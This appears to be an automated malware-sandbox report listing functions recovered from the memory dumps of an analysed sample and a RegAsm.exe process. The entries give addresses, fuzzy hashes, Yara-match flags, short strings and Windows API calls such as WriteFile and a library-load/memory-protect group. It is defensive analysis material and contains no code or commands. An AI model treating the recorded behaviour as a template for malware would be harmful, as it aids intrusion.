Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90aee013014facc953218ee00bb46d566ee5f09200d8a8eba246397d4d36c3c4
Instruction ID: 8b663eecb7218d163ecf7ceef5d7053ce58526b74c40f42c1d2808a6cc3bb093
Opcode Fuzzy Hash: 90aee013014facc953218ee00bb46d566ee5f09200d8a8eba246397d4d36c3c4
Instruction Fuzzy Hash: 4AD05E3134421ADBDE04B728F444AF973A1BB863217F0827AC14AC64688B28586AAB42

Uniqueness

Uniqueness Score: -1.00%

Function 00240F29, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371529283.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c76ea5a672b9931e6c7ea32957aa787d5469de3d141e9004127ca7bd774aeb
Instruction ID: f521e1529629a89bdb65c8c734b7b58bd957028a0df97c92cfc73edc49d7e964
Opcode Fuzzy Hash: 28c76ea5a672b9931e6c7ea32957aa787d5469de3d141e9004127ca7bd774aeb
Instruction Fuzzy Hash: F3D023395043409EDF1137F174544FE7B644DC7614300455FD40D87913ED7144144650

Uniqueness

Uniqueness Score: -1.00%

Function 00799668, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17df76113b7fb500fdf4ca09e26adfa49287c5f1356c6e6aa6890c332107b812
Instruction ID: b446642caa0b45f25a8cdc3539625d825134feb3a549b284090e7cf9d9b30f75
Opcode Fuzzy Hash: 17df76113b7fb500fdf4ca09e26adfa49287c5f1356c6e6aa6890c332107b812
Instruction Fuzzy Hash: EFD0A72004C280CFFD52071D7930F307F500B42305F6704CBE20B8D9F3C1195400911A

Uniqueness

Uniqueness Score: -1.00%

Function 00795F18, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e810828feae6c9e86839046505a8aa238b1d8a8f60433953a190a3a05ed26085
Instruction ID: 97c9e5ecb5772faa749a7e973c94b401bf00ed63ddc32bf57e9bff88d7985739
Opcode Fuzzy Hash: e810828feae6c9e86839046505a8aa238b1d8a8f60433953a190a3a05ed26085
Instruction Fuzzy Hash: 5FC0801272653457DE5971F9341147E318F05D5B75394053BB00AD7743EC594C0103E6

Uniqueness

Uniqueness Score: -1.00%

Function 0079E3D0, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f6009125cb7bf1b5403b251fc9cf00a80876be65910ac0cd193b9d9e4e29002
Instruction ID: 1519da8ae4217cdb57134d4c867c54782396e9ef73cc94e8ff9ad8c3873f0bd2
Opcode Fuzzy Hash: 3f6009125cb7bf1b5403b251fc9cf00a80876be65910ac0cd193b9d9e4e29002
Instruction Fuzzy Hash: 90D02230008300DBCB28D710F4808A3736ADB01322360063EF10B03600C7BABC80D780

Uniqueness

Uniqueness Score: -1.00%

Function 00240EA8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371529283.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2eb4e3afc812f01526d2989ae7e27f428df5ca24e2d65e962be14852bda02c
Instruction ID: f8c528110f711f193e3bc53d8e00bb454fae7f92c660bf10c0b6f4d17355e5f4
Opcode Fuzzy Hash: 4e2eb4e3afc812f01526d2989ae7e27f428df5ca24e2d65e962be14852bda02c
Instruction Fuzzy Hash: 30D0C73033D605DAF50A6765688963676A4AB10701F184815E64644053DABA55F06223

Uniqueness

Uniqueness Score: -1.00%

Function 00797E7A, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9459608a2edb720874a4be9f98a94328d56768b8cdf4fb0cbf9aa60ac9ed3360
Instruction ID: c44e7fd2a45609e069955a9dec7301540ab5a150ca25861daec04c3ff7beacc6
Opcode Fuzzy Hash: 9459608a2edb720874a4be9f98a94328d56768b8cdf4fb0cbf9aa60ac9ed3360
Instruction Fuzzy Hash: 8ED05238E20218CFCB41CF75EAA809D37F0AB0A362320072AE8029B3C0EB380C11CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00795628, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e233d362e1c2e444f75d4b25e9d88a418015cbcda87165abe26dab2eaf3b96da
Instruction ID: a8ff53a8b4714d3a4cac7a69ba296f5654d1498fccba4ef8fd44150122ae4c69
Opcode Fuzzy Hash: e233d362e1c2e444f75d4b25e9d88a418015cbcda87165abe26dab2eaf3b96da
Instruction Fuzzy Hash: 81D012342089258BDF122F647C0D3397F9EAB02B05FC41041D14A81461DF7C9944DF57

Uniqueness

Uniqueness Score: -1.00%

Function 00790180, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da19cb82de203773e001b7027f3dba553756db690a73c3c40a924d8913834d08
Instruction ID: e72c569608bbf0d1949443d65b43a60ea27699628ce76b60e1e685df0caaa9cb
Opcode Fuzzy Hash: da19cb82de203773e001b7027f3dba553756db690a73c3c40a924d8913834d08
Instruction Fuzzy Hash: 5FD01278210304CBCB183B74E42842837ABAB8B60E350087DE80A87760DE37A881CA46

Uniqueness

Uniqueness Score: -1.00%

Function 00799808, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a6a495b560ea64da814f6f46d80fed742ff0922bd1c8c4f7afea2a731d696b
Instruction ID: 1add71f2850a4a59f20cb189fa08dfdbe3537c12d5ce54690bd67650f395d4e4
Opcode Fuzzy Hash: 89a6a495b560ea64da814f6f46d80fed742ff0922bd1c8c4f7afea2a731d696b
Instruction Fuzzy Hash: F7B092312646084AFA6097B97844F26338C8B40629F448469B50CC2900E54BE8B11241

Uniqueness

Uniqueness Score: -1.00%

Function 00792DA8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10680a413f679e36de23bcc912caa651af7a0e5bd8a3bfd3e77d492a7e43f808
Instruction ID: 0eee6ab16a72d070d07253f5375eadd781a9d5c2846ff1ce4edc5490a96aca00
Opcode Fuzzy Hash: 10680a413f679e36de23bcc912caa651af7a0e5bd8a3bfd3e77d492a7e43f808
Instruction Fuzzy Hash: 78C092343CC208F6EED432803C2AFB636185705B01F300852BA4F54AA3078A2122A466

Uniqueness

Uniqueness Score: -1.00%

Function 00795E90, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67791e3d05e18903fea44a0172c3b8d8d13594e31787c982431985ea1d9b4e6
Instruction ID: 28fee83ec6f4e53aa5b9bd00ee135e22ee7c5d1f37da2b9d8b8563c5e901d04e
Opcode Fuzzy Hash: a67791e3d05e18903fea44a0172c3b8d8d13594e31787c982431985ea1d9b4e6
Instruction Fuzzy Hash: DCC08C34204A08CBAF022BB0380852E3A4D4A512083400024A40E86020EF2985002781

Uniqueness

Uniqueness Score: -1.00%

Function 00240CA1, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371529283.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe90ab11cfe88abb0fb929d749646d869efdcb788d52a5fd8c0234742f735c5
Instruction ID: 8eadd1e31792d8fe68a94cec51fd42bd1ed02c4730cdee754d2bb08de8460338
Opcode Fuzzy Hash: dbe90ab11cfe88abb0fb929d749646d869efdcb788d52a5fd8c0234742f735c5
Instruction Fuzzy Hash: C8C0022980FBD15EDB5357711966185AF348E039603CE49DFD4C0CB8A39408091D8376

Uniqueness

Uniqueness Score: -1.00%

Function 00790660, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80ad9957aaa426a66a22164a8781fbd3ac41e0e9a85b7f119bc9c01c7b0f12f
Instruction ID: a54871b30efe93d1ef54fc6d14344a522a8814c7294325c0e349b6a10f23e170
Opcode Fuzzy Hash: f80ad9957aaa426a66a22164a8781fbd3ac41e0e9a85b7f119bc9c01c7b0f12f
Instruction Fuzzy Hash: 68C02B35048304CEC30017F13C0C435B22E56C1302320C0718001011208F378832A495

Uniqueness

Uniqueness Score: -1.00%

Function 0079D360, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d2b302915d9cd85c05479328aad8d736be7d917b440e80be05e3422887bc5d
Instruction ID: 41da5497a15d033765bcb1049f76de3c09aeb523b541edc72236f524017ba9f2
Opcode Fuzzy Hash: d8d2b302915d9cd85c05479328aad8d736be7d917b440e80be05e3422887bc5d
Instruction Fuzzy Hash: A6B09230008718EBCA11AB61EC4A959772DBA432523E10518E802021A46B796D01E6D6

Uniqueness

Uniqueness Score: -1.00%

Function 00792F38, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e0a1b05e75c7fba1348a385d93fa1ecd39d45601e336ed09af53145881d888
Instruction ID: f68a91a41759c85f9f1eaa3ff38db50e0288720c34381df948a2320d5b3e9cbc
Opcode Fuzzy Hash: 78e0a1b05e75c7fba1348a385d93fa1ecd39d45601e336ed09af53145881d888
Instruction Fuzzy Hash: DFB0123034420A0A2B4037B37C4CA13339D560070438400E0940DC1011F544D4100050

Uniqueness

Uniqueness Score: -1.00%

Function 00240F30, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371529283.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ddf48c894e82aa5be514fad369f7445377d1bda914620243473e6e552b49d44
Instruction ID: 69cbf1e941896ea8df52886ce4ae3b8ff797f18fe463da7a0e7dc9654724ff9c
Opcode Fuzzy Hash: 9ddf48c894e82aa5be514fad369f7445377d1bda914620243473e6e552b49d44
Instruction Fuzzy Hash: 39B012342046088B9E0033F1741D52E725E09C45057408012A80D43212DD68591044E5

Uniqueness

Uniqueness Score: -1.00%

Function 00794502, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b289b389d78665ececb8126edf2c09cb332405c54af572fcf6bde9fc08a53ced
Instruction ID: ef9362ff93797d4ff281c9ac30bf7c5d716b371164bdf9f80680b5f5a93ce0ef
Opcode Fuzzy Hash: b289b389d78665ececb8126edf2c09cb332405c54af572fcf6bde9fc08a53ced
Instruction Fuzzy Hash: 9FB0123C50C040DB47010B2038184253A52A107301320F200C80382310E7E981077211

Uniqueness

Uniqueness Score: -1.00%

Function 00796761, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac03f52c82bb5f89af78e2da2b9273d9a23f41d784b4477c26c66f1cdc9b102c
Instruction ID: 7713cd42a10f5d9becab26fea66810cd8d752a767d0251fbda98e2f64bd44354
Opcode Fuzzy Hash: ac03f52c82bb5f89af78e2da2b9273d9a23f41d784b4477c26c66f1cdc9b102c
Instruction Fuzzy Hash: CEB0922A804A144AEB20EE255605B20BA66B740304F8790CE44402B073C714A8048D40

Uniqueness

Uniqueness Score: -1.00%

Function 00240CC0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371529283.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3ac01e52575d1879fa6c435503c4072147d3be0b39a8340d2c3d6b617d11d5
Instruction ID: a8fdc8e66c03d93aa43ce4faeb18c7ec02a51dc76df4175fffc2feae6d8e2a99
Opcode Fuzzy Hash: 0b3ac01e52575d1879fa6c435503c4072147d3be0b39a8340d2c3d6b617d11d5
Instruction Fuzzy Hash: 5CA00239D28560D7DE15B720F5E6415623967C83303F48755D60A01015857A6C665690

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00286BBA, Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

8T|_, xrefs: 00286F21

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: 8T|_
API String ID: 3389902171-120648609
Opcode ID: c10a86b41c725209f163db8fc92f54cea1cbd6ac5ba758d2e6a5140fed0d37b3
Instruction ID: 285f265aca541ebd8b86c8a0d7bc6121d7f26f83972db3120385521eb6f9ac3f
Opcode Fuzzy Hash: c10a86b41c725209f163db8fc92f54cea1cbd6ac5ba758d2e6a5140fed0d37b3
Instruction Fuzzy Hash: 23A1EA2C53E342CEDF24FF24859C725BA919B62350F74829ADDA74B6DAC3B0C4629713

Uniqueness

Uniqueness Score: -1.00%

Function 1E370FF6, Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2382603859.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91ecaf56a7ddb52ebe68a8128e727b6d0361ebd3a213ce8303bf5558697de0a
Instruction ID: a18f1273d8472d44ae16b9ccbe757091df3e2776694aad7270d497a2ee5a4613
Opcode Fuzzy Hash: e91ecaf56a7ddb52ebe68a8128e727b6d0361ebd3a213ce8303bf5558697de0a
Instruction Fuzzy Hash: C5E10AA684F7D10FDB13873548B2492BFB19D2321876E4ADBC8C1CF4A3E649191AD732

Uniqueness

Uniqueness Score: -1.00%

Function 00793020, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9791ed4151b6eee124cd82ed073716af205cc1e9133856df26efbb2e24db856
Instruction ID: 1fcf156b04d3be57e7528cd849e40a92a2e614ed07fab0ad94d5692f7016a346
Opcode Fuzzy Hash: f9791ed4151b6eee124cd82ed073716af205cc1e9133856df26efbb2e24db856
Instruction Fuzzy Hash: E3819032F111169BDB04DBA9E894A6EB7F3AFC8310F298178E419DB365DE35DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 007930E7, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e130bb317a0118131a9d1416b2372003c9845646a4f72e8ffc9177dd1382bc
Instruction ID: 83cb3bdaa536e8909a4af8c8490962f3897721060b51f09f2fe7a339b4c0e668
Opcode Fuzzy Hash: 31e130bb317a0118131a9d1416b2372003c9845646a4f72e8ffc9177dd1382bc
Instruction Fuzzy Hash: DB510932F115168BDB14DBA9D994B5EB7E3AFC8310F2AC168E409EB365DE34DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00286C05, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6fe7d60d9c5f2bfd120d3505bdd54697e1064a77f5da632301eba26d03a1aa2c
Instruction ID: 6e534c2e6778518182a2f5603078c4d99aa2adfacf45412e84812d330eb6ec15
Opcode Fuzzy Hash: 6fe7d60d9c5f2bfd120d3505bdd54697e1064a77f5da632301eba26d03a1aa2c
Instruction Fuzzy Hash: 1551D66C53A342CECB24EF58C89CB657A929F62310F28C29ADD974B6D6C3B1C461D713

Uniqueness

Uniqueness Score: -1.00%

Function 00285D6F, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2549807a613f91cddc5ca17b197f935a1a09f80a53d724e2c8e374bbcad5aca2
Instruction ID: e30c884b581c8850710a050cf3a82d865e3480bc35bb2ce4f8f22a7ac2f954ac
Opcode Fuzzy Hash: 2549807a613f91cddc5ca17b197f935a1a09f80a53d724e2c8e374bbcad5aca2
Instruction Fuzzy Hash: 91F04F7823AE218FC718EE04CAC4A69B2A56F14740B654465EC02C75E1C370EDA4DB11

Uniqueness

Uniqueness Score: -1.00%

Function 002857CD, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f6b8ef099746e07413dcf57f0b22a33205607cbc49ff8eb985d4b17f5cf6dd
Instruction ID: 3fec7c34926096addf279c02653978b96090e9973c6e5ccff4c4973a03793c9c
Opcode Fuzzy Hash: f2f6b8ef099746e07413dcf57f0b22a33205607cbc49ff8eb985d4b17f5cf6dd
Instruction Fuzzy Hash: 0BB09235322A40CFCE95CA08C190E80B3F0B700B00F9144C1E0018BA51C264E810CA00

Uniqueness

Uniqueness Score: -1.00%

Function 007901B8, Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

Xfd, xrefs: 007901DC
Xfd, xrefs: 0079023A
Xfd, xrefs: 0079020B
Xfd, xrefs: 00790264

Memory Dump Source

Source File: 00000006.00000002.2371824647.0000000000790000.00000040.00000001.sdmp, Offset: 00790000, based on PE: false

Similarity

API ID:
String ID: Xfd$Xfd$Xfd$Xfd
API String ID: 0-3275030475
Opcode ID: ec8d209df1eb803c302add1553a82841a2356a4e1808618c2b7b6b7ae3dc0ca0
Instruction ID: da4812a6129dd95d66cd5b3ec9dc2f5f19d80253dcd9de55cdf5a60258a449a4
Opcode Fuzzy Hash: ec8d209df1eb803c302add1553a82841a2356a4e1808618c2b7b6b7ae3dc0ca0
Instruction Fuzzy Hash: CD2108307112559FFF14CE68D884F6A73EAFFCA754F104869E5459B780EA74AC008BA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 1904 Parent PID: 2272 RegAsm.exeCOMMON

Executed Functions

Function 006B01B7, Relevance: 6.8, Strings: 5, Instructions: 574COMMON

Download Yara Rule

Strings

:@lq, xrefs: 006B074B
:@lq, xrefs: 006B0205
:@lq, xrefs: 006B0977
_qq, xrefs: 006B07C3
@2X, xrefs: 006B01E9

Memory Dump Source

Source File: 0000000F.00000002.2323032245.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq$:@lq$:@lq$@2X
API String ID: 0-2521680518
Opcode ID: 558dec6ef47f4dd37e926ae8e2d23ccd551bf5c099d6b84a8676fc8ac01ca2f1
Instruction ID: 84d975b5711b26482c53a37bee4c88afa1be97711bafa75e5bec69948c75b2bb
Opcode Fuzzy Hash: 558dec6ef47f4dd37e926ae8e2d23ccd551bf5c099d6b84a8676fc8ac01ca2f1
Instruction Fuzzy Hash: 84325D70600205CFEB24EF64D984AABBBF3BF88344F148969D9469B355DB70DC86DB90

Uniqueness

Uniqueness Score: -1.00%

Function 006B0710, Relevance: 10.4, Strings: 8, Instructions: 449COMMON

Download Yara Rule

Strings

:@lq, xrefs: 006B0AE2
:@lq, xrefs: 006B074B
\,X, xrefs: 006B09E7
:@lq, xrefs: 006B0977
_qq, xrefs: 006B07C3
\,X, xrefs: 006B0A1D
\,X, xrefs: 006B0A89
\,X, xrefs: 006B0A53

Memory Dump Source

Source File: 0000000F.00000002.2323032245.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq$:@lq$:@lq$\,X$\,X$\,X$\,X
API String ID: 0-3407334609
Opcode ID: 3237eda3a065132df28eb76ea630b3ad43604ee4e6ee0c1379c1e4d0b7f1ba6b
Instruction ID: 99975ec395ab4b1e5453ea6685fcabc0239fc2d892bf05cc369d74844555fbba
Opcode Fuzzy Hash: 3237eda3a065132df28eb76ea630b3ad43604ee4e6ee0c1379c1e4d0b7f1ba6b
Instruction Fuzzy Hash: 45029F706002069FDB15DB68C494AAEBBF2FF89304F14C5A9D9499B356DB31EC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006B0E30, Relevance: 5.5, Strings: 4, Instructions: 469COMMON

Download Yara Rule

Strings

\,X, xrefs: 006B127D
\,X, xrefs: 006B12EA
\,X, xrefs: 006B124A
\,X, xrefs: 006B12B0

Memory Dump Source

Source File: 0000000F.00000002.2323032245.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: \,X$\,X$\,X$\,X
API String ID: 0-2867601265
Opcode ID: a2d12ae55d7aa708abe6c1ec31c3ff1a942741f68da9f2438fdcc06a1e46dbf9
Instruction ID: df0339291a4b2aedb07d32199f21ec0608de9b2492414faf93adc28f182be8c2
Opcode Fuzzy Hash: a2d12ae55d7aa708abe6c1ec31c3ff1a942741f68da9f2438fdcc06a1e46dbf9
Instruction Fuzzy Hash: E8125C34710207DFD724EB2CD594A6A77E3BB89348B198164EC05DBBAADB71EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006B0D38, Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

\,X, xrefs: 006B0D60
\,X, xrefs: 006B0D72

Memory Dump Source

Source File: 0000000F.00000002.2323032245.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID:
String ID: \,X$\,X
API String ID: 0-392380463
Opcode ID: ea730b2f1748b0b3ca9b2fb52d89c189da56698c8b795b2816b4559fe2c23f11
Instruction ID: 42f6fb47b466836c56bd4bb3f92eeb4ed995c99a5d71478531ace7687d75df65
Opcode Fuzzy Hash: ea730b2f1748b0b3ca9b2fb52d89c189da56698c8b795b2816b4559fe2c23f11
Instruction Fuzzy Hash: 3701C430B042449FC705E7B4951559DBFF9FF85620F14C0AAD909EB792CF789E068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0057A6DF, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000E90,?,?), ref: 0057A78E

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: aeaf9b82ebe02571905c784a53675eebcab4bb1b1a4c5ec290712df87391642d
Instruction ID: 372238b2868710e15f701562e92f8073666cdadd441a39d620868134349b4a9c
Opcode Fuzzy Hash: aeaf9b82ebe02571905c784a53675eebcab4bb1b1a4c5ec290712df87391642d
Instruction Fuzzy Hash: 713171725093C05FD312CB21DC51B66BFB4EF43614F0A81CBD8849F193D225A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0057A4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E90,AD0E8E05,00000000,00000000,00000000,00000000), ref: 0057A53D

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6b71b67fa70f670f206767b7fc65008a0496de097123a0cbdd7025cb504b98cc
Instruction ID: b02df849147409ea4ec712e8adc0adf68a83dfd35c8a7b3627ae0d2d6ab944f2
Opcode Fuzzy Hash: 6b71b67fa70f670f206767b7fc65008a0496de097123a0cbdd7025cb504b98cc
Instruction Fuzzy Hash: C021A371409380AFEB228F61DC45F96BFB8EF46310F0885DBE9849B193D265A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 0057A71A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000E90,?,?), ref: 0057A78E

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: f19c5c4194d4674649ddb3c92c6a7bf925433935377d414ad261b6f330a6acac
Instruction ID: d9e6bb9f58aa18cb774486a01d19d4a429d1e499ed832b6a51e9b5243351fef7
Opcode Fuzzy Hash: f19c5c4194d4674649ddb3c92c6a7bf925433935377d414ad261b6f330a6acac
Instruction Fuzzy Hash: 85110171504340AFD310CB26DC42F77BFF8EF86620F0985AAEC489B642D275B915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0057A1F4, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0057A269

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: fe6d5e2fcc0bf1878e051267a7646bfcd7a96b3459cb6fe5fa091db27046e730
Instruction ID: aabd4fe46d6a41b7793e9ced8c68adaa2568df928d7e6bd8ca78b1ed4f33bb65
Opcode Fuzzy Hash: fe6d5e2fcc0bf1878e051267a7646bfcd7a96b3459cb6fe5fa091db27046e730
Instruction Fuzzy Hash: EB21907540D3C09FD7138B659C95692BFB0EF43220F0A81DBD9888F1A3D3699909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0057A4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E90,AD0E8E05,00000000,00000000,00000000,00000000), ref: 0057A53D

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: a972a9886783ef47a2630350b78df6530187a1d48a387345a3abe7921399270a
Instruction ID: 63c59ecd05019a2974bc11f8a879ea95c0a6d6e53bbccca40bec3d2649951392
Opcode Fuzzy Hash: a972a9886783ef47a2630350b78df6530187a1d48a387345a3abe7921399270a
Instruction Fuzzy Hash: D311E372400300EFEB21CF51EC85FAAFBE8EF44720F14C95AF9499A241D675A904DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0057A587, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0057A5F4

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0f4da83bd5c2c4e477fa55d8e8b9ba8131996183600f603c944aacd0a4a3080f
Instruction ID: d855fce03e3ae29b2b810773095cbb8710b196c6f82bae935195cf912bdab1ef
Opcode Fuzzy Hash: 0f4da83bd5c2c4e477fa55d8e8b9ba8131996183600f603c944aacd0a4a3080f
Instruction Fuzzy Hash: 2B119D758093C09FEB128B25DC45B92BFA4EF47324F0980DAD9884B263D265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0057A2A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0057A2FC

Memory Dump Source

Source File: 0000000F.00000002.2322950086.000000000057A000.00000040.00000001.sdmp, Offset: 0057A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
